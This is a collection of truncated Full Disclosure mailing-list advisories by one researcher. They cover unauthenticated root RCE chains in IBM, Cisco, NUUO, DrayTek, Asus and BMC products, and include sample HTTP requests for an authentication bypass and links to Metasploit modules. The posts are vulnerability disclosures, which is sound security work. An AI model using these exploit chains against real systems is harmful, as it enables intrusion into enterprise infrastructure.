[FD] Multiple 0days in IBM Data Risk Manager
Hi, I recently attempted to disclose some vulns to IBM via CERT/CC. They refused to accept the report, saying they only accept reports from paying customers... haha what a show! The markdown advisory is attached below - sorry, I usually send text ones, but have to move on to the current trends, plus it looks much better on GitHub: https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md Metasploit modules have been released and are available here: https://github.com/rapid7/metasploit-framework/pull/13300 https://github.com/rapid7/metasploit-framework/pull/13301 Enjoy! # Multiple Vulnerabilities in IBM Data Risk Manager ### By Pedro Ribeiro (ped...@gmail.com) from [Agile Information Security](https://agileinfosec.co.uk) Disclosure Date: 21/04/2020 | Last Updated: 21/04/2020 ## Introduction [From the vendor's website](https://www.ibm.com/products/data-risk-manager): *What you don’t know can hurt you. Identify and help prevent risks to sensitive business data that may impact business processes, operations, and competitive position. IBM Data Risk Manager provides executives and their teams a business-consumable data risk control center that helps to uncover, analyze, and visualize data-related business risks so they can take action to protect their business.* ## Summary **tl;dr scroll to the bottom to see videos of the exploits in action** IBM Data Risk Manager (IDRM) is an enterprise security software by IBM that aggregates and provides a full view of all the enterprise security risks, akin to an electronic risk register. The product receives information feeds from vulnerability scanning tools and other risk management tools, aggregates them and allows a user to investigate them and perform comprehensive analysis. The IDRM Linux virtual appliance was analysed and it was found to contain four vulnerabilities, three critical risk and one high risk: * Authentication Bypass * Command Injection * Insecure Default Password * Arbitrary File Download This advisory describes the four vulnerabilities and the steps necessary to chain the first three to achieve unauthenticated remote code execution as root. In addition, two Metasploit modules that bypass authentication and exploit the [remote code execution](https://github.com/rapid7/metasploit-framework/pull/13300) and [arbitrary file download](https://github.com/rapid7/metasploit-framework/pull/13301) are being released to the public. At the time of disclosure, it is unclear if the latest version 2.0.6 is affected by these, but most likely it is, as there is no mention of fixed vulnerabilities in any changelog, and it was released before the *attempt* to report these vulnerabilities to IBM. The latest version Agile InfoSec has access to is 2.0.3, and that one is certainly vulnerable. ### Here's a bunch of 0 days! At the time of disclosure these vulnerabilities are **"0 days"**. An attempt was made to contact [CERT/CC](https://www.kb.cert.org/vuls/) to coordinate disclosure with IBM, but IBM **REFUSED** to accept the vulnerability report, and responded to CERT/CC with: ***we have assessed this report and closed as being out of scope for our vulnerability disclosure program since this product is only for "enhanced" support paid for by our customers**. This is outlined in our policy https://hackerone.com/ibm. To be eligible to participate in this program, you must not be under contract to perform security testing for IBM Corporation, or an IBM subsidiary, or IBM client within 6 months prior to submitting a report.* This is an unbelievable response by IBM, a multi billion dollar company that is **selling security enterprise products and security consultancy** to huge corporations worldwide. They refused to accept a free high quality vulnerability report on one of their products, while putting ludicrous quotes like the following [on their website](https://www.ibm.com/security): *When every second counts, you need a unified defense to identify, orchestrate and automate your response to threats. IBM Security Threat Management solutions help you thrive in the face of cyber uncertainty.* *Building a custom security plan that is both industry-specific and aligned to your security maturity demands a partner with deep expertise and global reach. The IBM Security Strategy and Risk services team is that valued partner.* It should be noted that IBM offers no bounties on their "bug bounty program", just kudos:  In any case, I did not ask or expect a bounty since I do not have a HackerOne account and I don't agree with HackerOne's or IBM's disclosure terms there. I simply wanted to disclose these to IBM responsibly and let them fix it. ### So many questions... IDRM is an enterprise security product that handles very sensitive information. The hacking of an IDRM appliance might lead to a full scale company comprom
[FD] Multiple 0 day vulnerabilities in IBM Data Risk Manager
Hi, I recently attempted to disclose some vulns to IBM via CERT/CC. They refused to accept the report, saying they only accept reports from paying customers... haha what a show! The markdown advisory is attached below - sorry, I usually send text ones, but have to move on to the current trends, plus it looks much better on GitHub: https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md Metasploit modules have been released and are available here: https://github.com/rapid7/metasploit-framework/pull/13300 https://github.com/rapid7/metasploit-framework/pull/13301 Enjoy! # Multiple Vulnerabilities in IBM Data Risk Manager ### By Pedro Ribeiro (ped...@gmail.com) from [Agile Information Security](https://agileinfosec.co.uk) Disclosure Date: 21/04/2020 | Last Updated: 21/04/2020 ## Introduction [From the vendor's website](https://www.ibm.com/products/data-risk-manager): *What you don’t know can hurt you. Identify and help prevent risks to sensitive business data that may impact business processes, operations, and competitive position. IBM Data Risk Manager provides executives and their teams a business-consumable data risk control center that helps to uncover, analyze, and visualize data-related business risks so they can take action to protect their business.* ## Summary **tl;dr scroll to the bottom to see videos of the exploits in action** IBM Data Risk Manager (IDRM) is an enterprise security software by IBM that aggregates and provides a full view of all the enterprise security risks, akin to an electronic risk register. The product receives information feeds from vulnerability scanning tools and other risk management tools, aggregates them and allows a user to investigate them and perform comprehensive analysis. The IDRM Linux virtual appliance was analysed and it was found to contain four vulnerabilities, three critical risk and one high risk: * Authentication Bypass * Command Injection * Insecure Default Password * Arbitrary File Download This advisory describes the four vulnerabilities and the steps necessary to chain the first three to achieve unauthenticated remote code execution as root. In addition, two Metasploit modules that bypass authentication and exploit the [remote code execution](https://github.com/rapid7/metasploit-framework/pull/13300) and [arbitrary file download](https://github.com/rapid7/metasploit-framework/pull/13301) are being released to the public. At the time of disclosure, it is unclear if the latest version 2.0.6 is affected by these, but most likely it is, as there is no mention of fixed vulnerabilities in any changelog, and it was released before the *attempt* to report these vulnerabilities to IBM. The latest version Agile InfoSec has access to is 2.0.3, and that one is certainly vulnerable. ### Here's a bunch of 0 days! At the time of disclosure these vulnerabilities are **"0 days"**. An attempt was made to contact [CERT/CC](https://www.kb.cert.org/vuls/) to coordinate disclosure with IBM, but IBM **REFUSED** to accept the vulnerability report, and responded to CERT/CC with: ***we have assessed this report and closed as being out of scope for our vulnerability disclosure program since this product is only for "enhanced" support paid for by our customers**. This is outlined in our policy https://hackerone.com/ibm. To be eligible to participate in this program, you must not be under contract to perform security testing for IBM Corporation, or an IBM subsidiary, or IBM client within 6 months prior to submitting a report.* This is an unbelievable response by IBM, a multi billion dollar company that is **selling security enterprise products and security consultancy** to huge corporations worldwide. They refused to accept a free high quality vulnerability report on one of their products, while putting ludicrous quotes like the following [on their website](https://www.ibm.com/security): *When every second counts, you need a unified defense to identify, orchestrate and automate your response to threats. IBM Security Threat Management solutions help you thrive in the face of cyber uncertainty.* *Building a custom security plan that is both industry-specific and aligned to your security maturity demands a partner with deep expertise and global reach. The IBM Security Strategy and Risk services team is that valued partner.* It should be noted that IBM offers no bounties on their "bug bounty program", just kudos:  In any case, I did not ask or expect a bounty since I do not have a HackerOne account and I don't agree with HackerOne's or IBM's disclosure terms there. I simply wanted to disclose these to IBM responsibly and let them fix it. ### So many questions... IDRM is an enterprise security product that handles very sensitive information. The hacking of an IDRM appliance might lead to a full scale company comprom
[FD] Multiple vulns in Cisco UCS Director: from unauth remote access to code execution as root
Hi, tl;dr three vulns (auth bypass, command injection, default password) in Cisco UCS and Cisco IMC Supervisor, two of which (auth bypass + command injection) can be chained to achieve unauthenticated RCE as root Full advisory below, can also be fetched from https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-ucs-rce.txt Metasploit modules have been submitted to: https://github.com/rapid7/metasploit-framework/pull/12243 https://github.com/rapid7/metasploit-framework/pull/12244 Thanks to Accenture Security (previously iDefense) for helping me disclose this to the vendor! >> Multiple critical vulnerabilities in Cisco UCS Director, Cisco Integrated Management Controller Supervisor and Cisco UCS Director Express for Big Data >> Discovered by Pedro Ribeiro (ped...@gmail.com) from Agile Information Security = Disclosure: 21/08/2019 / Last updated: 22/08/2019 >> Executive summary: Cisco UCS Director (UCS) is a cloud orchestration product that automates common private cloud infrastructure management functions. It is built using Java and a variety of other technologies and distributed as a Linux based virtual appliance. A demo of the UCS virtual appliance can be freely downloaded from Cisco's website [1]. Due to several coding errors, it is possible for an unauthenticated remote attacker with no privileges to bypass authentication and abuse a password change function to inject arbitrary commands and execute code as root. In addition, there is a default unprivileged user with a known password that can login via SSH and execute commands on the virtual appliance provided by Cisco. Two Metasploit modules were released with this advisory, one that exploits the authentication bypass and command injection, and another that exploits the default SSH password. Please note that according to Cisco [2] [3] [4], all three vulnerabilities described in this advisory affect Cisco UCS Director, Cisco Integrated Management Controller Supervisor and Cisco UCS Director Express for Big Data. However, Agile Information Security only tested Cisco UCS Director. Agile Information Security would like to thank Accenture Security (previously iDefense) [5] for handling the disclosure process with Cisco. >> Vendor description [6]: "Cisco UCS Director delivers a foundation for private cloud Infrastructure as a Service (IaaS). It is a heterogeneous management platform that features multivendor task libraries with more than 2500 out-of-the-box workflow tasks for end-to-end converged and hyperconverged stack automation. You can extend your capabilities to: - Automate provisioning, orchestration, and management of Cisco and third-party infrastructure resources - Order resources and services from an intuitive self-service portal - Automate security and isolation models to provide repeatable services - Standardize and automate multitenant environments across shared infrastructure instances" >> Technical details: #1 Vulnerability: Web Interface Authentication Bypass / CWE-287 CVE-2019-1937 Cisco Bug ID: CSCvp19229 [2] Risk Classification: Critical Attack Vector: Remote Constraints: No authentication required Affected versions: confirmed in Cisco UCS Director versions 6.6.0 and 6.7.0, see [2] for Cisco's list of affected versions UCS exposes a management web interface on ports 80 and 443 so that users of UCS can perform cloud management functions. Due to a number of coding errors and bad practices, it is possible for an unauthenticated attacker to obtain an administrative session by bypassing authentication. The following sequence of requests and responses shows the authentication bypass works. 1.1) First we send a request to ClientServlet to check our authentication status: GET /app/ui/ClientServlet?apiName=GetUserInfo HTTP/1.1 Host: 10.0.3.100 Referer: https://10.0.3.100/ X-Requested-With: XMLHttpRequest ... to which the server responds with a redirect to the login page since we are not authenticated: HTTP/1.1 302 Found Location: https://10.0.3.100/app/ui/login.jsp Content-Length: 0 Server: Web 1.2) We now follow the redirection to obtain a JSESSIONID cookie: GET /app/ui/login.jsp HTTP/1.1 Host: 10.0.3.100 Referer: https://10.0.3.100/ X-Requested-With: XMLHttpRequest And the server responds with our cookie: HTTP/1.1 200 OK Set-Cookie: JSESSIONID=95B8A2D15F1E0712B444F208E179AE2354E374CF31974DE2D2E1C14173EAC745; Path=/app; Secure; HttpOnly Server: Web 1.3) Then we repeat the request from 1.1), but this time with the JSESSIONID cookie obtained in 1.2): GET /app/ui/ClientServlet?apiName=GetUserInfo HTTP/1.1 Host: 10.0.3.100 Referer: https://10.0.3.100/ Cookie: JSESSIONID=95B8A2D15F1E0712B444F208E179AE2354E374CF31974DE2D2E1C14173EAC74; X-Requested-With: XMLHttpRequest ... and we still get redirected to the login page, as in step 1.1): HTTP/1.1 302 Found Location: https://10.0.3.100/app/ui/logi
[FD] [Multiple CVE] - Cisco Identity Services Engine unauth stored XSS to RCE as root
Hi, On January 20th, SSD disclosed 3 vulnerabilities found by Agile Information Security in their Cisco Identity Services Engine (ISE) product. These are unauth stored XSS, unsafe Java deserialization and privesc to root, which when combined allow an unauthenticated attacker to achieve remote code execution as root - as long as you can get an admin to visit the ISE page vulnerable to stored XSS. This is my take on it. Cisco has been incredibly negligent throughout this whole affair: - they did not assign CVE numbers to java deserialization and the privesc, making it impossible to track them - it is not clear what / if any versions are fixed from their security bulletins - they still recommend version 2.4.0.357 as the suggested release in the downloads section of their website; this is the version we tested and found vulnerable to everything described below - the java deserialization and privesc vulnerabilities were independently found by other researchers and reported around the same time, but Cisco refused to give Agile Information Security any credit In summary, this is a total mess. It is pretty evident that Cisco does not care about security or keeping their customers informed, they just like to sweep security issues under the rug. Good luck doing that with a public exploit. We would like to thank Beyond Security's SSD Disclosure programme for helping us deal with Cisco and avoid even more headaches. Their advisory can be found at https://ssd-disclosure.com/index.php/archives/3778 and a copy of the text below can be found in my repo at https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-ise-rce.txt. Get the exploit from SSD's post or from https://raw.githubusercontent.com/pedrib/PoC/master/exploits/ISEpwn.rb == >> Multiple vulnerabilities in Cisco Identity Services Engine (unauthenticated stored XSS to RCE as root) >> Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information Security and Dominik Czarnota (dominik.b.czarn...@gmail.com) = Disclosure: 20/01/2019 / Last updated: 05/02/2019 >> Background and product information >From the vendor's website [1]: The Cisco Identity Services Engine (ISE) is your one-stop solution to streamline security policy management and reduce operating costs. With ISE, you can see users and devices controlling access across wired, wireless, and VPN connections to the corporate network. Cisco ISE allows you to provide highly secure network access to users and devices. It helps you gain visibility into what is happening in your network, such as who is connected, which applications are installed and running, and much more. It also shares vital contextual data, such as user and device identities, threats, and vulnerabilities with integrated solutions from Cisco technology partners, so you can identify, contain, and remediate threats faster." >> Summary ISE is distributed by Cisco as a virtual appliance. We have analysed version 2.4.0.357 and found three vulnerabilities: an unauthenticated stored cross site scripting, a authenticated Java deserialization vulnerability leading to remote code execution as an unprivileged user, and a privilege escalation from that unprivileged user to root. By putting them all together, we can achieve remote code execution as root, provided we can trap an administrator into visiting the ISE page vulnerable to the stored cross site scripting. A Ruby exploit that implements this full exploit chain (described in more detail at 'Exploitation summary', at the end of this file) is available in [2]. All the vulnerabilities in this advisory were found independently by Agile Information Security. However, vulnerability #2 (Unsafe Flex AMF Java Object Deserialization) was also found and reported to Cisco by Olivier Arteau of Groupe Technologie Desjardins [3] and vulnerability #3 (Privilege Escalation via Incorrect sudo File Permissions) was also found and reported to Cisco by Hector Cuesta [4]. Cisco refused to credit Agile Information Security with finding vulnerabilities #2 and #3, and also refused to provide a CVE for both these vulnerabilities, saying regarding #3 that "This issue has been evaluated as a hardening effort to improve the security posture of the device. According with our Security vulnerability policy, we request do not request a CVE assignment for issue with a Severity Impact Rating (SIR) lower than Medium. This issue will be fixed in the upcoming ISE release". At the time of the latest update, Cisco still recommends version 2.4.0.357 - affected by all the vulnerabilities in this advisory - as the "Suggested Release" in their software download page. These actions show Cisco is incredibly negligent with regards to the security of their customers. They are still shipping (and recommending) a product version vulnerable to unauthenticated remote code execu
[FD] [Several CVE]: NUUO CMS - multiple vulnerabilities resulting in unauth RCE
Hi,
In October 2018, ICS-CERT issued an advisory for Nuuo CMS:
https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02
Long story short, Nuuo CMS contained several vulnerabilities that allow
an unauthenticated attacker (up to version 2.3) or an authenticated
attacker (up to version 3.5) to achieve RCE, download arbitrary files, etc.
Disclosure on this one took near TWO YEARS. And even after Nuuo saying
they have fixed everything, they clearly haven't. I only held off
disclosing it earlier because I had promised ICS-CERT not to do so.
Their work and patience (ICS-CERT) is much appreciated in this disclosure.
I'm releasing 4 Metasploit exploit modules with this advisory that
target different versions of the software, and the one which exploits
the arbitrary file download still works on the latest version (3.5).
The full advisory is below, and a copy can be fetched from
https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt
>> Multiple vulnerabilities in NUUO Central Management Server
>> Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information
Security (http://www.agileinfosec.co.uk/)
==
Disclosure: 11/10/2018 / Last updated: 21/01/2019
>> Background on the affected products:
NUUO is a vendor of Network Video Recording (NVR) systems for
surveillance cameras. These NVR are Linux embedded video recording
systems that can manage a number of cameras and are used worldwide by
public institutions, banks, SME's, etc.
From their webpage:
"The Central Management System (NCS) is a powerful system which brings
traditional central management systems out of the control room through
Internet access. The network-based key operation system can manage
unlimited combinations of analog and network cameras worldwide, via
unlimited working stations in different locations. NCS is the universal
solution for large scale projects.
The NCS System uses client/server architecture to manage unlimited
recording systems. These send events to the NCS Alarm Server. After
filtering the events, the NCS Alarm server sends alarm logs of
pre-determined events to a SQL Server (SQL database) and NCS Client
systems. The NCS Client system allows users in different locations to
log in to the NCS Alarm server and, if they have the authority, to
change the system configuration. The NCS Matrix system can be viewed as
an extension of the NCS client used to populate the alarms to additional
monitors. NCS Matrix system is controlled by NCS Client users."
A more detailed explanation can be found in [1]. Nuuo Central Management
System / NCS will be referred to as CMS for the remainder of this document.
The disclosure of these vulnerabilities were handled by ICS-CERT, which
have generously donated their time to ensure (some) vulnerabilities were
fixed by Nuuo. Their advisory can be seen at [2].
It Nuuo TWO YEARS to fix 6 out of 7 of the vulnerabilities presented
here, and one of them (authenticated arbitrary file download) is still
unfixed as of the date of the latest update to this advisory.
The vulnerablities were reported to ICS-CERT on 4/11/2016, and ICS-CERT
reported them to Nuuo shortly after. There were many emails back and
forth between ICS-CERT, myself and Nuuo, until finally ICS-CERT
disclosed the vulnerability on 11/10/2018, 23 days shy of two years.
I will not write a detailed timeline nor disclose any communications, as
it is clear that Nuuo handled this in a very incompetent way. The only
reason I did not disclose it earlier was because of the help and
patience of ICS-CERT.
Four Metasploit modules have been released with this advisory ([3]).
These will be submitted to Metasploit in the coming days and should be
integrated into the framework soon.
A copy of this advisory can be found at [4].
>> Summary:
NUUO CMS uses a ASCII based network protocol ("NUCM") which is similar
to HTTP. This protocol is used for communication between the CMS client
and the server. The default port for this protocol is TCP 5180.
As an example, for the CMS client to login to CMS server the following
request is sent:
USERLOGIN NUCM/1.0
Version:
Username:
Password-Length:
TimeZone-Length:
To which the server responds:
NUCM/1.0 200 OK
User-Valid: 1
Server-Version:
Ini-Version: 1
License-Number:
User-Session-No:
The client can then issue a series of commands, such as order cameras to
move, make a backup of the alarms in the server, create a user, etc.
The full list of HTTP-like verbs that the NUCM protocol accepts can be
found in Appendix #A.
While this protocol provides a mechanism for authentication, the
assignment of user session numbers is flawed, and can easily be guessed
by an attacker in under 500,000 attempts (probably less if analysed
thoroughly).
In addition to this, some verbs of the protocol have directory traversal
flaws, which can be exploited by an authenticated attacker to downl
[FD] [CVE-2018-15379] Unauth RCE as root in Cisco Prime Infrastructure
Hi, Here's a quick and easy unauth RCE as root in Cisco Prime Infrastructure. This is a product widely deployed in data centers for router management... good luck. Thanks to Beyond Security SSD programme for helping me disclose this to Cisco. Their advisory can be found at: https://blogs.securiteam.com/index.php/archives/3723 And my own copy at: https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-prime-infrastructure.txt Metasploit module has been submitted and waiting for PR: https://github.com/rapid7/metasploit-framework/pull/10765 Advisory follows: >> Unauthenticated remote code execution and privilege escalation in Cisco Prime Infrastructure >> Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/) == Disclosure: 4/10/2018 / Last updated: 8/10/2018 >> Introduction: From the vendor's website ([1]): "Cisco Prime Infrastructure simplifies the management of wireless and wired networks. This single, unified solution provides wired and wireless lifecycle management, and application visibility and control. It also offers policy monitoring and troubleshooting with the Cisco Identity Services Engine (ISE) and location-based tracking of mobility devices with the Cisco Mobility Services Engine (MSE). You can manage the network, devices, applications, and users – all from one place. Cisco Prime Infrastructure offers support for 802.11ac, correlated wired-wireless client visibility, spatial maps, Radio Frequency prediction tools, and much more. Simplify the management of the wireless infrastructure while solving problems faster and with fewer resources. Cisco Prime Infrastructure offers new, guided workflows for the Intelligent WAN and Converged Access, based on Cisco best practices. These workflows make new branch rollouts easy and fast, from setting up devices and services to automatically managing and monitoring them. Cisco Prime Infrastructure offers fault, configuration, accounting, performance, and security (FCAPS) management with 360-degree views of Cisco Unified Computing System Series B Blade Servers and Series C Rack Servers and Cisco Nexus switches, including the Application-Centric Infrastructure–ready Cisco Nexus 9000 Series Switches. Your data center is critical to service assurance. Manage it effectively with Cisco Prime Infrastructure. Device Packs offer ongoing support of new Cisco devices and software releases. It provides parity within each device family, eliminating gaps in management operations, especially when it comes to service availability and troubleshooting. Technology Packs deliver new features between releases, accelerating time to value for high-demand functionality. Large or global organizations often distribute network management by domain, region, or country. Cisco Prime Infrastructure Operations Center lets you visualize up to 10 Cisco Prime Infrastructure instances, scaling your management infrastructure while maintaining central visibility and control." >> Background and summary: Cisco Prime Infrastructure (CPI) contains two basic flaws that when exploited allow an unauthenticated attacker to achieve remote code execution. The first flaw is a file upload vulnerability that allows the attacker to upload and execute files as the Apache Tomcat user; the second is a privilege escalation to root by bypassing execution restrictions in a SUID binary. A Metasploit module has been released with this advisory, and can be found at [2] and [3]. This module exploits the two vulnerabilities described in this advisory to achieve unauthenticated remote code execution as root on the CPI default installation. It should be integrated into Metasploit's repository in the coming weeks. A special thanks to Beyond Security and their SecuriTeam Secure Disclosure (SSD) programme, which have helped me disclose this vulnerability to the vendor. Their version of this advisory can be found in [2]. >> Technical details: #1 Vulnerability: Arbitrary file upload and execution via tftp and Apache Tomcat CVE-2018-15379 Attack Vector: Remote Constraints: None Affected products / versions: - Cisco Prime Infrastructure 3.2 and later (latest version at the time of writing is 3.4); earlier versions might be affected Most web applications running on the CPI virtual appliance are deployed under /opt/CSCOlumos/apache-tomcat-/webapps. One of these applications is "swimtemp", which symlinks to /localdisk/tftp: ade # ls -l /opt/CSCOlumos/apache-tomcat-8.5.14/webapps/ total 16 drwxrwxr-x. 3 root gadmin 4096 Mar 29 19:49 ROOT drwxrwxr-x. 8 root gadmin 4096 Mar 29 21:44 SSO lrwxrwxrwx. 1 root gadmin 36 Mar 29 21:32 SSO.war -> /opt/CSCOlumos/wars/SSO-13.0.201.war drwxrwxr-x. 4 root gadmin 4096 Mar 29 21:45 ifm_poap_rest lrwxrwxrwx. 1 root gadmin 45 Mar 29 21:32 ifm_poap_rest.war -> /opt/CSCOlumos/wars/ifm_poap
[FD] [CVE-2018-1418] IBM QRadar SIEM unauthenticated remote code execution as root
Hi all, 3 vulns in IBM QRadar SIEM that when chained allow an attacker to achieve unauthenticated RCE as root on the QRadar host. IBM have only attributed on CVE for all 3 vulns, and they have a combined CVSS score of 5.6. So totally own a SIEM = 5.6 CVSS. Sounds right to me. A special thanks to Beyond Security's SSD programme, which helped me disclose these 3 vulnerabilities. See their advisory at: https://blogs.securiteam.com/index.php/archives/3689 Also available in my repo: https://raw.githubusercontent.com/pedrib/PoC/master/advisories/ibm-qradar-siem-forensics.txt A Metasploit module has been released, and it is pending approval: https://github.com/rapid7/metasploit-framework/pull/10108 Regards, Pedro >> Multiple vulnerabilities in IBM QRadar SIEM >> Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/) == Disclosure: 28/05/2018 / Last updated: 25/08/2018 >> Introduction: From IBM's website [1]: "IBM® QRadar® SIEM detects anomalies, uncovers advanced threats and removes false positives. It consolidates log events and network flow data from thousands of devices, endpoints and applications distributed throughout a network. It then uses an advanced Sense Analytics engine to normalize and correlate this data and identifies security offenses requiring investigation. As an option, it can incorporate IBM X-Force® Threat Intelligence which supplies a list of potentially malicious IP addresses including malware hosts, spam sources and other threats. QRadar SIEM is available on premises and in a cloud environment." >> Background and summary: QRadar has a built-in server side application to perform forensic analysis on certain files. The vulnerabilities described below show how two logical bugs in the forensics application can be abused to bypass authentication, write a file to disk and execute it as an unpriviliged user. This file can then abuse a vulnerability in the way cron jobs are handled to cause a shell script to be executed as root. In summary, the full exploit chain allows an unauthenticated attacker to achieve remote code execution as root with a couple of HTTP requests. The forensics application is disabled in the free Community Edition, but the code is still there, and part of it still works. This application has two components, one servlet running in Java, and the main web application running PHP. QRadar has an Apache reverse proxy sitting in front of all its web applications, which routes requests according to the URL. Requests sent to /console/* get routed to the main "console" application, which not only runs the web interface but also performs the main functions of QRadar (and is not affected by these vulnerabilities). Then there are several helper applications, such as the forensics application described above, which can be reached at /forensics and /ForensicAnalysisServlet, the SOLR server, reachable at /solr and others. Special thanks to SecuriTeam for helping me disclose this vulnerability. Please see their advisory at [2] and IBM's response at [3]. Note that IBM have attributed a combined CVE for all three vulnerabilities, CVE-2018-1418. They have also scored these three vulnerabilities as CVSS 5.6... A Metasploit module that exploits these vulnerabilities to achieve unauthenticated remote code execution as root has been released in [4]. >> Technical details: #1 Vulnerability: Authentication Bypass (in ForensicAnalysisServlet) CVE-2018-1418 Attack Vector: Remote Constraints: None Affected products / versions: - IBM QRadar SIEM: 7.3.0 and 7.3.1 confirmed; possibly all versions released since mid-2014 are affected QRadar authentication is done via a SEC cookie, which is a session UUID. This is managed centrally by a session manager which runs in the main QRadar console application. The SEC cookies can be obtained in three ways: - Upon login in the main console application - Using a previously created authorisation token (also created in the console) - From the /etc/qradar/conf/host.token file, which contains a UUID generated at install time, used by internal services to perform administrative actions. The ForensicAnalysisServlet stores the SEC cookie in a HashMap, and then checks if the cookie is valid with the console application before committing any action... except for one specific codepath. The function doGetOrPost() processes all requests to ForensicsAnalysisServlet. This function does a number of actions, such as fetching a results file, checking the status of an analysis request, etc. In order to authenticate, the requester has to have its SEC and QRadarCSRF tokens registered with the servlet. This is done by application with the setSecurityTokens action, with which a requester specifies both tokens and registers them with the servlet. In order to perform authentication fo
[FD] [CVE-2017-5641] - DrayTek Vigor ACS 2 Java Deserialisation RCE
Hi all, tl;dr DrayTek Vigor ACS server, a remote enterprise management system for DrayTek routers, uses a vulnerable version of the Adobe / Apache Flex Java library that has a deserialisation vulnerability. This can be exploited by an unauthenticated attacker to achieve RCE as root / SYSTEM on all versions until 2.2.2. Full advisory is below, and a copy of it plus the exploit code is in my repo https://github.com/pedrib/PoC/tree/master/exploits/acsPwn. Thanks to Beyond Security SSD programme for helping me disclose this vulnerability to the vendor. You can find details on their blog at https://blogs.securiteam.com/index.php/archives/3681 >> DrayTek VigorACS 2 Unsafe Flex AMF Java Object Deserialization >> Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information Security = Disclosure: 18/04/2018 / Last updated: 19/04/2018 >> Background and summary >From the vendor's website [1]: "VigorACS 2 is a powerful centralized management software for Vigor Routers and VigorAPs, it is an integrated solution for configuring, monitoring, and maintenance of multiple Vigor devices from a single portal. VigorACS 2 is based on TR-069 standard, which is an application layer protocol that provides the secure communication between the server and CPEs, and allows Network Administrator to manage all the Vigor devices (CPEs) from anywhere on the Internet. VigorACS 2 Central Management is suitable for the enterprise customers with a large scale of DrayTek routers and APs, or the System Integrator who need to provide a real-time service for their customer's DrayTek devices." VigorACS is a Java application that runs on both Windows and Linux. It exposes a number of servlets / endpoints under /ACSServer, which are used for various functions of VigorACS, such as the management of routers and firewalls using the TR-069 protocol [2]. One of the endpoints exposed by VigorACS, at /ACSServer/messabroker/amf, is an Adobe/Apache Flex service that is reachable by the managed routers and firewalls. This advisory shows that VigorACS uses a Flex version is vulnerable to CVE-2017-5641 [3], a vulnerability related to unsafe Java deserialization for Flex AMF objects, which can be abused to achieve unauthenticated remote code execution as root under Linux or SYSTEM under Windows. This vulnerability was disclosed under Beyond Security SecuriTeam Secure Disclosure (SSD) programme, which have provided assistance to the vendor throughout the disclosure process [4]. >> Technical details: Vulnerability: Unsafe Flex AMF Java Object Deserialization CVE-2017-5641 Attack Vector: Remote Constraints: None; exploitable by an unauthenticated attacker Affected versions: confirmed on v2.2.1; earlier versions most likely affected By sending an HTTP POST request with random data to /ACSServer/messagebroker/amf, the server will respond with a 200 OK and binary data that includes: ...Unsupported AMF version X... While in the server logs, a stack trace will be produced that includes the following: flex.messaging.io.amf.AmfMessageDeserializer.readMessage ... flex.messaging.endpoints.amf.SerializationFilter.invoke ... ... A quick Internet search revealed CVE-2017-5641 [3], which clearly states in its description: "Previous versions of Apache Flex BlazeDS (4.7.2 and earlier) did not restrict which types were allowed for AMF(X) object deserialization by default. During the deserialization process code is executed that for several known types has undesired side-effects. Other, unknown types may also exhibit such behaviors. One vector in the Java standard library exists that allows an attacker to trigger possibly further exploitable Java deserialization of untrusted data. Other known vectors in third party libraries can be used to trigger remote code execution." Further reading in [5], [6] and [7] led to proof of concept code (Appendix A) that creates a binary payload that can be exploited to achieve remote code execution through unsafe Java deserialization. A fully working exploit has been released with this advisory that works in the following way: a) sends an AMF binary payload to /ACSServer/messagebroker/amf as described in [6] to trigger a Java Remote Method Protocol (JRMP) call back to the attacker b) receives the JRMP connection with ysoserial's JRMP listener [8] c) configures ysoserial to respond with a CommonsCollections5 or CommonsCollections6 payload, as a vulnerable version of Apache Commons 3.1 is in the Java classpath of the server d) executes code as root / SYSTEM The exploit has been tested against the Linux and Windows Vigor ACS 2.2.1, although it requires a ysoserial jar patched for multi argument handling (a separate branch in [8], or alternative a ysoserial patched with CommonsCollections5Chained or CommonsCollections6Chained - see [9]). Appendix A contains the Java code used to gen
Re: [FD] SSD Advisory – Hack2Win – Asus Unauthenticated LAN Remote Command Execution
On 22 January 2018 at 19:00, Maor Shwartz <ma...@beyondsecurity.com> wrote: > SSD Advisory – Hack2Win – Asus Unauthenticated LAN Remote Command Execution > > Full report: https://blogs.securiteam.com/index.php/archives/3589 > Twitter: @SecuriTeam_SSD > Weibo: SecuriTeam_SSD > > Vulnerabilities Summary > The following advisory describes two (2) vulnerabilities found in AsusWRT > Version 3.0.0.4.380.7743. The combination of the vulnerabilities leads to > LAN remote command execution on any Asus router. > > AsusWRT is “THE POWERFUL USER-FRIENDLY INTERFACE – The enhanced ASUSWRT > graphical user interface gives you easy access to the 30-second, 3-step > web-based installation process. It’s also where you can configure AiCloud > 2.0 and all advanced options. ASUSWRT is web-based, so it doesn’t need a > separate app, or restrict what you can change via mobile devices — you get > full access to everything, from any device that can run a web browser” > > The vulnerabilities found are: > > Access bypass > Configuration manipulation > > Credit > An independent security researcher, Pedro Ribeiro (pedrib_at_gmail.com), > has reported this vulnerability to Beyond Security’s SecuriTeam Secure > Disclosure program. > > Vendor response > Asus were informed of the vulnerabilities and released patches to address > them (version 3.0.0.4.384_10007). > > For more details: > https://www.asus.com/Static_WebPage/ASUS-Product-Security-Advisory/ > > Just to add that MITRE has provided CVE for the issues found: Access bypass: CVE-2018-5999 Configuration manipulation: CVE-2018-6000 Thanks again to SecuriTeam for helping with the disclosure. Advisory links have been updated: https://blogs.securiteam.com/index.php/archives/3589 https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt Regards, Pedro ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [CVE-2016-6598/9]: RCE and admin cred disclosure in BMC Track-It! 11.4
Happy new year!
I was doing some new year cleaning and realised I never released this
advisory properly. Two vulnerabilities in BMC Track-It! 11.4 which were
